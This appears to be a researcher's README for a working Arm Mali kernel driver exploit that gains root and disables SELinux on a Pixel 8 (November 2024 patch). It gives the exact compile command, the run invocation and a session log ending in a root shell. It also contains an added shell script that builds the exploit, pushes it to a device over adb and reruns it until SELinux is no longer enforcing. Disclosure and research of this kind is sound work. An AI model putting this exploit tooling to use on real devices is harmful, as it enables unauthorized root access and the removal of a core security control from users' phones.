The write-up can be found here. This is a bug in the Arm Mali kernel driver that I reported in December 2024. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
The exploit is tested on the Google Pixel 8 with the November 2024 patch (AP3A.241105.007). It needs to be compiled against the OpenCL headers and linked with the OpenCL library libGLES_mali.so. On a Pixel 8 the library is at /vendor/lib64/egl/libGLES_mali.so, and the OpenCL headers can be found in the KhronosGroup OpenCL-Headers repository. I used the v2023.04.17 version of the headers, although other versions should also work. Because the command below links with -L. -lGLES_mali and includes with -I., copy the library (and the headers' CL/ directory) into the working directory first, or adjust the -L and -I paths. For reference, I used the following command to compile with clang from NDK r26b:
android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_userio.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_userio
At run time the dynamic loader must be able to find libGLES_mali.so; when running the binary from /data/local/tmp on the device, point LD_LIBRARY_PATH at /vendor/lib64/egl. The exploit rarely fails, and when it does it normally neither corrupts nor crashes the system, so it can simply be rerun. If successful, it disables SELinux and drops into a root shell; in the session below the prompt changes from $ to # once the exploit finishes.
shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_userio
gpu_addr 5ffff94000
group_handle 1 cookie 30000
group_handle 1 cookie 30000
found entry 4000093deaf443 at 384 in page 0
overwrite addr : 5ffff00c60 c60
overwrite addr : 5fffb00c60 c60
overwrite addr : 5ffff00f40 f40
overwrite addr : 5fffb00f40 f40
run enforce
result 50
clean up
shiba:/ #
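The build, deploy and run steps above, collected into one helper script. This is an added example and not part of the exploit repository; the NDK location (NDK_ROOT), the OpenCL-Headers checkout (CL_HEADERS), the retry count (MAX_TRIES), a device reachable over adb, and the three exploit sources sitting in the current directory are all assumptions of the script, as is using `getenforce` reporting Permissive or Disabled as the success check for "SELinux disabled".

```shell
#!/bin/sh
# Added example (not part of the original exploit repository): build the
# exploit against the device's libGLES_mali.so, push it, and rerun it until
# SELinux is reported disabled. NDK_ROOT, CL_HEADERS, MAX_TRIES, the adb
# connection and the success check below are assumptions about the setup.
set -eu

NDK_ROOT="${NDK_ROOT:-${HOME:-.}/android-ndk-r26b}"
CL_HEADERS="${CL_HEADERS:-${HOME:-.}/OpenCL-Headers}"   # assumed checkout of KhronosGroup/OpenCL-Headers
MAX_TRIES="${MAX_TRIES:-5}"
CC="$NDK_ROOT/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang"
DEVICE_DIR=/data/local/tmp

# The README's compile command uses "-L. -lGLES_mali", so the device's
# library has to be in the working directory at link time.
fetch_lib() {
    [ -f libGLES_mali.so ] || adb pull /vendor/lib64/egl/libGLES_mali.so .
}

# Same compile command as the README, with the header checkout added to the
# include path so CL/cl.h resolves without copying it into the working dir.
build() {
    [ -x "$CC" ] || { echo "NDK clang not found at $CC" >&2; return 1; }
    [ -f "$CL_HEADERS/CL/cl.h" ] || { echo "OpenCL headers not found under $CL_HEADERS" >&2; return 1; }
    fetch_lib
    "$CC" -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -I"$CL_HEADERS" -L. \
        mali_userio.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_userio
}

# Success check (assumption): the exploit disables SELinux, so getenforce is
# expected to report Permissive (or Disabled) afterwards instead of Enforcing.
# Takes the getenforce output, returns 0 on success and 1 otherwise.
selinux_disabled() {
    case "$1" in
        Permissive|Disabled) return 0 ;;
        *) return 1 ;;
    esac
}

# Push the binary and rerun it until the success check passes. The README
# notes that a failed run normally leaves the system intact, which is what
# makes a plain retry loop reasonable.
deploy_and_run() {
    adb push mali_userio "$DEVICE_DIR/"
    i=1
    while [ "$i" -le "$MAX_TRIES" ]; do
        # stdin from /dev/null so the root shell spawned by the exploit
        # (-DSHELL) exits on EOF instead of waiting for interactive input.
        adb shell "cd $DEVICE_DIR && LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_userio" </dev/null || true
        state=$(adb shell getenforce </dev/null | tr -d '\r\n')
        if selinux_disabled "$state"; then
            echo "exploit succeeded on attempt $i (getenforce: $state)"
            return 0
        fi
        echo "attempt $i did not disable SELinux (getenforce: $state), retrying" >&2
        i=$((i + 1))
    done
    echo "giving up after $MAX_TRIES attempts" >&2
    return 1
}

# Dispatch only when invoked with a subcommand, so the functions above can
# also be sourced without side effects.
if [ $# -gt 0 ]; then
    case "$1" in
        build) build ;;
        run)   deploy_and_run ;;
        all)   build && deploy_and_run ;;
        *)     echo "usage: $0 build|run|all" >&2; exit 2 ;;
    esac
fi
```

Run `./run_mali_userio.sh all` from the directory holding the three source files; the script stops on the first attempt where `getenforce` no longer reports Enforcing, which is the condition the README's session output ends in.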
To test it with MTE enabled, follow these instructions to enable kernel MTE.